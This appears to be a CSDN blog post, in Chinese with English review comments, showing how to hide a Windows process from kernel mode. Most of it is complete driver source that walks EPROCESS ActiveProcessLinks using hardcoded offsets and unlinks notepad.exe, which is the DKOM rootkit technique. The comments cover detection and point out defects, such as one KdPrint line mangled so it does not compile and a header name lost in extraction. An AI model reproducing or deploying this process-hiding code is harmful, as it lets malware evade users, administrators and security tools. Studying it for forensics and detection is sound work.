
【進(jìn)程隱藏之內(nèi)核】EPROCESSSS結(jié)構(gòu)體

來源:CSDN 時間:2023-02-07 10:26:41



進(jìn)程隱藏之內(nèi)核實(shí)現(xiàn)

1、在內核模式下,系統為每個進程維護了一個EPROCESS結構體,系統所有的進程是通過EPROCESS結構體中的一個ActiveProcessLinks指向的雙向循環鏈表連接起來的,通過WinDbg內核調試工具就可以發現並獲取其相對於EPROCESS結構體的偏移(0x88),這樣我們可以通過遍歷該循環鏈表找到我們的目的進程,將其在鏈表中的節點刪除即可隱藏該進程。(EPROCESS中進程PID相對偏移為0x84,進程名字相對偏移為0x174;這些偏移只對作者當時調試的那個內核版本有效,不同版本的EPROCESS布局並不相同。)

代碼如下:

/****************************   Hide a process in kernel mode      sky_2012.12.13****************************/
/*
 * What this listing does: starting from the EPROCESS of the current process it
 * walks the kernel's ActiveProcessLinks list looking for an entry whose image
 * name equals "notepad.exe", then unlinks that entry from the list (direct
 * kernel object manipulation).
 *
 * NOTE(review), for anyone reading this as an analysis/detection exercise:
 *  - The EPROCESS offsets used below (0x84 = PID, 0x88 = ActiveProcessLinks,
 *    0x174 = image name) were read off the author's WinDbg session and are
 *    valid for that one kernel build only; EPROCESS layout differs per build.
 *  - DWORD is defined as ULONG (32 bits) and kernel pointers are cast into it,
 *    so this is 32-bit-only code.
 *  - The shared list is modified with no synchronization against concurrent
 *    list changes, and the unlinked EPROCESS keeps its own stale Flink/Blink.
 *  - Defensive view: the process itself is not removed (threads, handles and
 *    the PID table are untouched), which is why memory-forensics tooling finds
 *    list-unlinked processes by cross-view comparison (list walk versus object
 *    scan / PID table), and why 64-bit kernels' integrity protection (Kernel
 *    Patch Protection) treats this kind of write as tampering.
 */
/* The header name was lost in the page's extraction; for a WDM driver this is
 * normally <ntddk.h> -- confirm against the original source. */
#include
#define DWORD ULONG
void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp);
/* Original comment says "find the process by PID", but the code below actually
 * matches on the image name stored in EPROCESS; see FindProcessEPROCESS. */
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);
/* Global holding the ANSI form of the target name; only read by DriverEntry. */
ANSI_STRING Process_Name;

/*
 * Driver entry point.
 *
 * Registers trivial create/close dispatch handlers and the unload routine, then
 * searches the active-process list for "notepad.exe" and, if found, unlinks it.
 *
 * Driver_Object: the driver object supplied by the I/O manager.
 * RegisterPath:  the driver's registry path (unused here).
 * Returns STATUS_SUCCESS whether or not the target process was found.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object, IN PUNICODE_STRING RegisterPath)
{
PLIST_ENTRY  pre_ActiveProcessLink;
int flg = 0;
DWORD preprocess = 0x00000000;
CHAR *string1 = "notepad.exe";
Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;
Driver_Object->DriverUnload = DriverUnload;
/* Locate the ActiveProcessLinks entry of the process that precedes the one the
 * author wants to hide (the original comment says "protect"). `preprocess` is
 * that LIST_ENTRY address, not an EPROCESS base, despite the helper's name. */
RtlInitAnsiString(&Process_Name,string1);
preprocess = FindProcessEPROCESS(&Process_Name,&flg);
/* Remove the target's node from the doubly linked list by rewriting the
 * neighbours' links. The target's own Flink/Blink are left as they were. */
if(flg)
{
pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
/* predecessor now points past the target ... */
pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
/* ... and the successor points back to the predecessor. */
pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
KdPrint(("Delete Success!\n"));
}
else
{
/* The apostrophe in "doesn't" was mangled by the page's extraction; as
 * printed, this line does not compile. */
KdPrint(("notepad.exe dos"nt exist!\n"));
}
return STATUS_SUCCESS;
}

/*
 * Walk the active-process list looking for a process whose image name equals
 * PsName (case-sensitive compare: the CaseInSensitive argument is FALSE).
 *
 * PsName: ANSI name to look for.
 * flg:    set to 1 when a match is found; NOT written on the not-found path,
 *         so the caller must initialise it (DriverEntry does).
 * Returns the address of the ActiveProcessLinks entry of the process that
 * precedes the match (the matched entry's Blink), or 0 when the walk comes
 * back to the PID it started from without a match.
 *
 * The 0x84 / 0x88 / 0x174 constants are EPROCESS field offsets for the
 * author's kernel build (PID, ActiveProcessLinks, image name); the
 * "- 0x88 + ..." arithmetic is a hand-rolled CONTAINING_RECORD.
 */
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
ANSI_STRING CurName;
PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;
DWORD CUR_EPROCESS = 0x00000000;
DWORD curent_id = 0;   /* PID of the entry currently being examined */
DWORD start_id =0;     /* PID of the process the walk started from */
int count = 0;         /* number of entries visited in the loop */
/* Start from the process in whose context DriverEntry runs. */
CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
start_id = curent_id;
/* RtlInitAnsiString scans for a NUL; this assumes the image-name field is
 * NUL-terminated within the EPROCESS -- TODO confirm for the target build. */
RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
/* Names equal: the current process itself is the match. */
if(!RtlCompareString(PsName, &CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
/* Otherwise keep walking forward around the circular list. */
while(1)
{
count++;
cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
/* Recover the EPROCESS base from the LIST_ENTRY (- 0x88), then read the name
 * (+ 0x174) and PID (+ 0x84) fields. */
RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);
curent_id = 
*((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
if(!RtlCompareString(PsName,&CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
/* Back at the starting PID: full circle with no match. (count is always
 * >= 1 here, so the check reduces to the PID comparison.) */
else if (count>=1&&(start_id == curent_id))
{
KdPrint(("沒有找到!\n"));
return 0x00000000;
}
}
}

/*
 * Default dispatch routine for IRP_MJ_CREATE and IRP_MJ_CLOSE.
 * Completes every IRP immediately with STATUS_SUCCESS and no priority boost.
 */
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp)
{
NTSTATUS status = STATUS_SUCCESS;
KdPrint(("Enter HelloDDKDispatchRoutine\n"));
/* Complete the IRP. */
pIrp->IoStatus.Status = status;
IoCompleteRequest(pIrp, IO_NO_INCREMENT );
KdPrint(("Leave HelloDDKDispatchRoutine\n"));
return status;
}

/*
 * Unload routine. Only logs; nothing done in DriverEntry is undone, so the
 * list modification persists after the driver is unloaded.
 */
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
KdPrint(("DriverUnload!\n"));
}
